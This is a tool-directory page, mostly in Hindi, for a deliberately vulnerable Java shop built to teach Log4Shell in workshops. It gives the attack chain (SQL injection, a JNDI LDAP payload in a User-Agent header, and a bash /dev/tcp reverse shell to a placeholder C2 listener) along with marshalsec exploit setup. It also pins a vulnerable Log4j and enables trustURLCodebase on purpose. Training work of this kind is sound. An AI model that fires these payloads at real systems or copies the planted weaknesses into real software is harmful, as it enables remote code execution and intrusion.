Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
TraditionalJay — जानबूझकर कमजोर VM-hosted Java shop — Log4Shell (CVE-2021-44228) workshop lab (EC2 / Azure VM / GCE) | Kitploit
उपकरण/GitHubGitHub/astraljays/traditionaljay
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षाकमांड एंड कंट्रोललर्निंग और शिक्षालैब और अभ्यास
GitHubastraljays/traditionaljay

TraditionalJay

जानबूझकर कमजोर VM-hosted Java shop — Log4Shell (CVE-2021-44228) workshop lab (EC2 / Azure VM / GCE)

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

TraditionalJay

जानबूझकर असुरक्षित क्लासिक / पारंपरिक सुरक्षा कार्यशालाओं के लिए दुकान — Java एक VM (EC2, Azure VM, या GCP Compute Engine) पर, कंटेनरों में नहीं।

मुख्य कहानी: क्रिटिकल VM समझौता — SQL इंजेक्शन → Log4Shell (CVE-2021-44228) → बाहरी C2 के लिए रिवर्स शेल।

[!CAUTION] उत्पादन खातों में तैनात न करें। VMs को अस्थायी और नेटवर्क-स्कोप्ड अपनी प्रयोगशाला तक रखें।

यह क्यों मौजूद है

Jay's Surf Shop क्लाउड-नेटिव रनटाइम (ECS / ACA / GKE) को कवर करता है। TraditionalJay होस्ट / VM लेन को कवर करता है:

Surf ShopTraditionalJay
कम्प्यूटकंटेनर / सर्वरलेसएकल Linux VM
स्टैकNext.js + PythonSpring Boot + Log4j2
हेडलाइन CVEPillow, React2Shell, YAML, …Log4Shell

त्वरित आरंभ (स्थानीय)

root@kitploit:~
cd app
mvn -DskipTests spring-boot:run
# open http://localhost:8080
# exploit lab: http://localhost:8080/security

Java 11+ और Maven आवश्यक है।

क्रिटिकल VM समझौता

  1. SQL इंजेक्शन — /search पर स्ट्रिंग-कॉन्कैट SQLite एक secrets तालिका डंप करता है।
  2. Log4Shell — Log4j 2.14.1 JNDI LDAP लुकअप आपके लिसनर पर।
  3. रिवर्स शेल → C2 — आपके C2 लिसनर को अल्पकालिक bash /dev/tcp डायल।
root@kitploit:~
# listeners (reachable from the VM)
python3 tools/ldap-listen.py --port 1389
python3 tools/c2-listen.py --port 4444

# or open http://HOST:8080/security and click Run Critical VM Compromise
curl -s -X POST "http://HOST:8080/api/demo/critical-vm-compromise" \
  --data-urlencode "ldap_callback=YOUR_IP:1389" \
  --data-urlencode "c2_callback=YOUR_IP:4444" | jq .

Log4Shell — पूर्ण RCE (सैंडबॉक्स)

केवल जांच (LDAP डायल-आउट साबित करता है):

root@kitploit:~
python3 tools/ldap-listen.py --port 1389

पूर्ण RCE (marshalsec LDAP + दूरस्थ Exploit.class; VM जानबूझकर trustURLCodebase=true के साथ चलता है):

root@kitploit:~
./tools/setup-marshalsec.sh
./tools/run-log4shell-ldap.sh --codebase-host YOUR_PUBLIC_IP

फिर /security खोलें, LDAP कॉलबैक YOUR_PUBLIC_IP:1389 पर सेट करें, Run Log4Shell पर क्लिक करें। सफलता पर VM को /tmp/jss-log4shell-rce, /tmp/jss-log4shell-id.txt, और होस्ट-सेंसर डेमो के लिए लगभग 45 सेकंड का इंटरैक्टिव bash (जब उपलब्ध हो तो script के माध्यम से PTY) मिलता है।

आप खोज को एक निर्मित User-Agent से भी हिट कर सकते हैं:

root@kitploit:~
curl -s "http://localhost:8080/search?q=wax" \
  -H 'User-Agent: ${jndi:ldap://127.0.0.1:1389/a}' -o /dev/null

Upwind होस्ट सेंसर (पहला बूट)

Upwind क्रेडेंशियल्स को स्थानीय terraform.tfvars (gitignored) के माध्यम से पास करें। क्लाउड-इनिट उन्हें निर्यात करता है और scripts/install-vm.sh scripts/install-upwind-sensor.sh चलाता है।

मेमोरी: scanner-v2=true को इंस्टॉल के समय लगभग 7 GiB खाली RAM (डिस्क नहीं) चाहिए। डिफ़ॉल्ट AWS Terraform t3.large (8 GiB) + 40 GiB gp3 रूट का उपयोग करता है ताकि स्कैनर छूट न जाए (Skipping scanner installation, requires 7000000 kB छोटे इंस्टेंस पर)।

root@kitploit:~
curl -s https://get.upwind.io/sensor.sh | \
  UPWIND_CLIENT_ID=… \
  UPWIND_CLIENT_SECRET=… \
  UPWIND_AGENT_EXTRA_CONFIG="scanner-v2=true" \
  bash -s

AWS उदाहरण infrastructure/aws/terraform.tfvars:

root@kitploit:~
upwind_client_id          = "…"
upwind_client_secret      = "…"
upwind_agent_extra_config = "scanner-v2=true"

यदि क्रेडेंशियल खाली हैं, तो ऐप अभी भी इंस्टॉल होता है और सेंसर चरण छोड़ दिया जाता है।

CI

GitHub Actions वर्कफ़्लो .github/workflows/build.yml:

  • push / PR / मैन्युअल → Maven पैकेज + JAR आर्टिफैक्ट अपलोड करें
  • टैग v* → फैट JAR के साथ GitHub Release

VMs scripts/install-vm.sh के माध्यम से नवीनतम Release JAR पसंद करते हैं, और यदि अभी तक कोई रिलीज़ मौजूद नहीं है तो ऑन-बॉक्स Maven बिल्ड पर वापस आ जाते हैं। इंस्टॉलर तब /opt/traditionaljay/BOOT-INF/lib/ के अंतर्गत फैट JAR को विस्फोट करता है और JarLauncher चलाता है, ताकि होस्ट/एजेंटलेस SCA डिस्क पर log4j-core-2.14.1.jar देख सके (केवल java -jar app.jar चलाने से Log4j एक ज़िप के अंदर घोंसला बनाता है और अक्सर CVE-2021-44228 को पैकेज इन्वेंट्री से छुपाता है)।

root@kitploit:~
# cut a release (triggers JAR publish)
git tag v0.1.0 && git push origin v0.1.0

क्लाउड VM पर तैनात करें

प्रत्येक क्लाउड फ़ोल्डर स्वतंत्र Terraform है। पहला बूट scripts/install-vm.sh (OpenJDK 11 + Release JAR या Maven बिल्ड + systemd) चलाता है।

AWS (EC2)

root@kitploit:~
cd infrastructure/aws
terraform init
terraform apply
terraform output application_url

Azure (VM)

root@kitploit:~
cd infrastructure/azure
terraform init
terraform apply -var="ssh_public_key=$(cat ~/.ssh/id_rsa.pub)"
terraform output application_url

GCP (Compute Engine)

root@kitploit:~
cd infrastructure/gcp
terraform init
terraform apply -var="project_id=YOUR_PROJECT"
terraform output application_url

पहले बूट में कुछ मिनट लगते हैं जबकि Maven इंस्टेंस पर बिल्ड करता है। फिर http://PUBLIC_IP:8080/security खोलें।

लेआउट

root@kitploit:~
app/                     Spring Boot दुकान + /security Log4Shell UI
tools/ldap-listen.py     केवल-बैनर LDAP लिसनर (डायल-आउट प्रमाण)
tools/run-log4shell-ldap.sh  पूर्ण RCE LDAP + HTTP कोडबेस सर्वर
tools/exploit/Exploit.java   marshalsec के लिए दूरस्थ क्लास पेलोड
scripts/install-vm.sh    क्लाउड-इनिट / मैन्युअल VM इंस्टॉलर
infrastructure/aws|azure|gcp

सुरक्षा नोट्स

  • डेमो पथ वास्तविक Log4Shell RCE के लिए पृथक सैंडबॉक्स में marshalsec LDAPRefServer + tools/exploit/Exploit.class का उपयोग करता है।
  • JVM फ़्लैग -Dcom.sun.jndi.ldap.object.trustURLCodebase=true जानबूझकर है (Java 11+ पर डिफ़ॉल्ट रूप से अक्षम)।
  • केवल-बैनर ldap-listen.py कोड निष्पादन के बिना LDAP डायल-आउट प्रमाण के लिए बना रहता है।
  • डिफ़ॉल्ट फ़ायरवॉल 22/8080 पर 0.0.0.0/0 की अनुमति देते हैं — साझा प्रयोगशालाओं के लिए *_ingress_cidr / स्रोत श्रेणियों को कसें।
  • पिन जानबूझकर Log4j 2.14.1 पर रहता है। व्यायाम को बदले बिना इसे "ठीक" न करें।
टूल डाउनलोड करें